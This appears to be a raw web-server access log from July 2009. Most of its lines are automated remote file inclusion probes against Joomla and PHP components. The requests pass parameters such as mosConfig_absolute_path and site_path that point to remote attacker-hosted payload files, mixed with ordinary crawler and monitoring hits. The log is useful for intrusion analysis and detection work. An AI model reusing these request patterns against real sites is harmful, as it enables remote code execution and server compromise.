67.208.139.72 - - [06/Jul/2009:01:21:54 -0400] "GET /logs/access_log.Q109051600%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:21:58 -0400] "GET /logs/access_log.Q109060900%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:01:22:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.231.126.252 - - [06/Jul/2009:01:22:31 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
131.203.76.246 - - [06/Jul/2009:01:22:36 -0400] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://hotshot24.co.kr/contents/kcp/payplus/log/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
131.203.76.246 - - [06/Jul/2009:01:22:36 -0400] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://hotshot24.co.kr/contents/kcp/payplus/log/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
131.203.76.246 - - [06/Jul/2009:01:22:36 -0400] "GET /logs/access_log.Q109061200/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://hotshot24.co.kr/contents/kcp/payplus/log/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jul/2009:01:23:16 -0400] "GET /logs/access_log.Q109061700///vwar/backup/errors.php?error=http://id1.fileave.com/id1.txt.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.30.65.36 - - [06/Jul/2009:01:24:24 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):14+RNSUBS%20(S0040):0 HTTP/1.0" 200 58715 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.65.36 - - [06/Jul/2009:01:24:36 -0400] "GET /images/Office%20Supply/ HTTP/1.0" 200 3623 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.249.36.194 - - [06/Jul/2009:01:24:36 -0400] "GET /logs/access_log.Q109061300//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:01:25:14 -0400] "GET /logs/access_log.Q109052300%20%20//include/admin.lib.inc.php?site_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:01:25:14 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:01:25:14 -0400] "GET /logs/access_log.Q109061700///vwar/backup/errors.php?error=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:01:25:50 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:01:26:00 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:26:48 -0400] "GET /logs/include/lib.inc.php?site_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:26:48 -0400] "GET /include/lib.inc.php?site_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:26:48 -0400] "GET /logs/access_log.Q109052800/include/lib.inc.php?site_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:01:27:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.125.38.117 - - [06/Jul/2009:01:27:52 -0400] "GET /logs/access_log.Q109060300%20%20/include/lib.inc.php?site_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:27:54 -0400] "GET /include/lib.inc.php?site_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:27:54 -0400] "GET /logs/include/lib.inc.php?site_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:27:54 -0400] "GET /logs/access_log.Q109052800/include/lib.inc.php?site_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
61.100.186.87 - - [06/Jul/2009:01:27:58 -0400] "GET /logs/index.php?show=http://www.ypm-lpmb.com/idx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
61.100.186.87 - - [06/Jul/2009:01:27:58 -0400] "GET /index.php?show=http://www.ypm-lpmb.com/idx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
61.100.186.87 - - [06/Jul/2009:01:27:58 -0400] "GET /logs/access_log.Q109051600/index.php?show=http://www.ypm-lpmb.com/idx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.100.186.87 - - [06/Jul/2009:01:28:04 -0400] "GET /logs/access_log.Q109061900/index.php?show=http://www.ypm-lpmb.com/idx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.80.241.115 - - [06/Jul/2009:01:29:31 -0400] "GET //galeria.php?start=0&kategoria=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
200.80.241.115 - - [06/Jul/2009:01:29:31 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.80.241.115 - - [06/Jul/2009:01:29:33 -0400] "GET /logs//galeria.php?start=0&kategoria=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
200.80.241.115 - - [06/Jul/2009:01:29:38 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.146.231.194 - - [06/Jul/2009:01:29:43 -0400] "GET /logs/error_log.Q109062100//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.yeojuspa.co.kr/board/readme.txt? HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
218.146.231.194 - - [06/Jul/2009:01:29:44 -0400] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.yeojuspa.co.kr/board/readme.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.79"
220.231.126.252 - - [06/Jul/2009:01:29:52 -0400] "GET /logs/access_log.Q109052300%20%20//include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:01:30:12 -0400] "GET /logs/access_log.Q109052300%20%20//include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:30:23 -0400] "GET /logs/access_log.Q109052800%20%20/include/lib.inc.php?site_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:01:30:35 -0400] "GET /logs/access_log.Q109052800%20%20/include/lib.inc.php?site_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
131.203.76.246 - - [06/Jul/2009:01:30:43 -0400] "GET /logs/access_log.Q109051900/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://hotshot24.co.kr/contents/kcp/payplus/log/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:31:17 -0400] "GET /logs/access_log.Q109061700///////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:31:17 -0400] "GET /logs///////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 8396 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:31:18 -0400] "GET ///////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 457 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:31:39 -0400] "GET ///////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 457 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:31:39 -0400] "GET /logs/access_log.Q109061700%20%20///////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:31:40 -0400] "GET /logs///////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 8396 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:31:42 -0400] "GET /logs/access_log.Q109061700%20%20///////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:31:42 -0400] "GET /logs///////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 8396 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:31:42 -0400] "GET ///////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 457 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:31:52 -0400] "GET /logs/access_log.Q109061700%20%20///////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:01:32:01 -0400] "GET /logs/access_log.Q109060900/index.php?stranica=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:01:32:01 -0400] "GET /logs/index.php?stranica=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:01:32:01 -0400] "GET /index.php?stranica=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
65.55.231.22 - - [06/Jul/2009:01:32:03 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.231.22 - - [06/Jul/2009:01:32:03 -0400] "GET /images/items/45417901_THUMB.JPG HTTP/1.1" 200 14987 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
209.59.12.99 - - [06/Jul/2009:01:32:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.55.231.22 - - [06/Jul/2009:01:32:04 -0400] "GET /CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8 HTTP/1.1" 200 64809 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
67.208.139.72 - - [06/Jul/2009:01:32:05 -0400] "GET /logs/access_log.Q109061700///////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:01:32:05 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?stranica=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:32:05 -0400] "GET /logs/access_log.Q109061700///////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:01:32:15 -0400] "GET /logs/access_log.Q109062700%20%20/index.php?stranica=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.146.231.194 - - [06/Jul/2009:01:32:21 -0400] "GET /logs/access_log.Q109062500//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.yeojuspa.co.kr/board/readme.txt? HTTP/1.1" 404 292 "-" "libwww-perl/5.79"
122.214.48.150 - - [06/Jul/2009:01:32:33 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
122.214.48.150 - - [06/Jul/2009:01:32:33 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
122.214.48.150 - - [06/Jul/2009:01:32:33 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:01:33:09 -0400] "GET /logs/access_log.Q109062700/index.php?stranica=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.214.48.150 - - [06/Jul/2009:01:34:07 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
122.214.48.150 - - [06/Jul/2009:01:34:13 -0400] "GET /logs/access_log.Q109060200%20%20//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:01:35:31 -0400] "GET //?_zb_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:01:35:31 -0400] "GET /logs/access_log.Q109053000//?_zb_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:01:35:31 -0400] "GET /logs//?_zb_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 8391 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:36:20 -0400] "GET /?_zb_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:36:20 -0400] "GET /logs/access_log.Q109051100%20%20/?_zb_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:36:21 -0400] "GET /logs/?_zb_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jul/2009:01:37:03 -0400] "GET /index.php?stranica=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:01:37:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
119.93.90.155 - - [06/Jul/2009:01:37:14 -0400] "GET /logs/access_log.Q109060900/index.php?stranica=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jul/2009:01:37:14 -0400] "GET /logs/index.php?stranica=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jul/2009:01:37:35 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?stranica=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.38.136.16 - - [06/Jul/2009:01:37:47 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/log.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
218.38.136.16 - - [06/Jul/2009:01:37:59 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/log.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
119.93.90.155 - - [06/Jul/2009:01:38:07 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jul/2009:01:38:18 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jul/2009:01:38:18 -0400] "GET /logs/access_log.Q109051200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jul/2009:01:38:25 -0400] "GET /index.php?conteudo=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jul/2009:01:38:25 -0400] "GET /logs/index.php?conteudo=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jul/2009:01:38:32 -0400] "GET /logs/access_log.Q109051000/index.php?conteudo=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.100.186.87 - - [06/Jul/2009:01:39:04 -0400] "GET /logs/access_log.Q109051600%20%20/index.php?show=http://www.ypm-lpmb.com/idx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jul/2009:01:39:14 -0400] "GET /index.php?conteudo=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jul/2009:01:39:14 -0400] "GET /logs/index.php?conteudo=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jul/2009:01:39:21 -0400] "GET /logs/access_log.Q109051000/index.php?conteudo=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.100.186.87 - - [06/Jul/2009:01:40:06 -0400] "GET /logs/access_log.Q109060100%20%20/index.php?show=http://www.ypm-lpmb.com/idx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.146.231.194 - - [06/Jul/2009:01:41:06 -0400] "GET ///administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.yeojuspa.co.kr/board/readme.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
119.93.90.155 - - [06/Jul/2009:01:41:48 -0400] "GET /logs/access_log.Q109062700%20%20/index.php?stranica=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:01:42:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [06/Jul/2009:01:42:08 -0400] "GET //components/com_fabrik/fabrik_functions.php?mosConfgi_absolute_path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:01:42:10 -0400] "GET /logs//components/com_fabrik/fabrik_functions.php?mosConfgi_absolute_path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.80.241.115 - - [06/Jul/2009:01:42:33 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.80.241.115 - - [06/Jul/2009:01:42:47 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jul/2009:01:42:55 -0400] "GET /logs/access_log.Q109061200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:01:42:59 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_fabrik/fabrik_functions.php?mosConfgi_absolute_path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:01:43:44 -0400] "GET //components/com_fabrik/fabrik_functions.php?mosConfgi_absolute_path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:01:43:46 -0400] "GET /logs//components/com_fabrik/fabrik_functions.php?mosConfgi_absolute_path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:01:44:19 -0400] "GET /logs/access_log.Q109062300//components/com_fabrik/fabrik_functions.php?mosConfgi_absolute_path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
123.143.98.5 - - [06/Jul/2009:01:44:32 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
123.143.98.5 - - [06/Jul/2009:01:44:32 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
123.143.98.5 - - [06/Jul/2009:01:44:36 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.249.68.70 - - [06/Jul/2009:01:44:41 -0400] "GET /images/items/0032376_thumb.jpg HTTP/1.1" 200 2203 "-" "Googlebot-Image/1.0"
67.208.139.72 - - [06/Jul/2009:01:45:08 -0400] "GET /popup.php?path=http://game24x7.com/_a?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:45:08 -0400] "GET /logs/popup.php?path=http://game24x7.com/_a?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:45:09 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://game24x7.com/_a?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:01:45:11 -0400] "GET /?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:01:45:11 -0400] "GET /logs/?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:01:45:11 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:01:45:17 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jul/2009:01:45:25 -0400] "GET /logs/access_log.Q109062300/index.php?conteudo=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:45:29 -0400] "GET /popup.php?path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:45:29 -0400] "GET /logs/popup.php?path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:45:29 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:45:45 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://game24x7.com/_a?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jul/2009:01:45:56 -0400] "GET /logs/access_log.Q109051000%20%20/index.php?conteudo=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:01:46:02 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jul/2009:01:46:13 -0400] "GET /logs/access_log.Q109051000%20%20/index.php?conteudo=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:01:46:28 -0400] "GET /logs/access_log.Q109052400/ncaster/admin/addons/archive/archive.php?adminfolder=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.30.65.36 - - [06/Jul/2009:01:47:04 -0400] "GET /logs/access_log.Q109051200 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [06/Jul/2009:01:47:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [06/Jul/2009:01:47:25 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
123.143.98.5 - - [06/Jul/2009:01:47:36 -0400] "GET /logs/access_log.Q109060200%20%20//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.19.130.218 - - [06/Jul/2009:01:48:51 -0400] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.810"
67.19.130.218 - - [06/Jul/2009:01:48:51 -0400] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.810"
67.19.130.218 - - [06/Jul/2009:01:48:51 -0400] "GET /logs/error_log.Q109062300/bookmark4u/lostpasswd.php?env[include_prefix]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.810"
67.19.130.218 - - [06/Jul/2009:01:48:51 -0400] "GET /logs/access_log.Q109061200/bookmark4u/lostpasswd.php?env[include_prefix]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.810"
195.34.78.110 - - [06/Jul/2009:01:49:24 -0400] "GET /logs/access_log.Q109062300//components/com_fabrik/fabrik_functions.php?mosConfgi_absolute_path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:01:49:30 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_fabrik/fabrik_functions.php?mosConfgi_absolute_path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
122.214.48.150 - - [06/Jul/2009:01:50:37 -0400] "GET /logs/access_log.Q109060200//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.146.231.194 - - [06/Jul/2009:01:51:50 -0400] "GET /logs/access_log.Q109052100///administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.yeojuspa.co.kr/board/readme.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
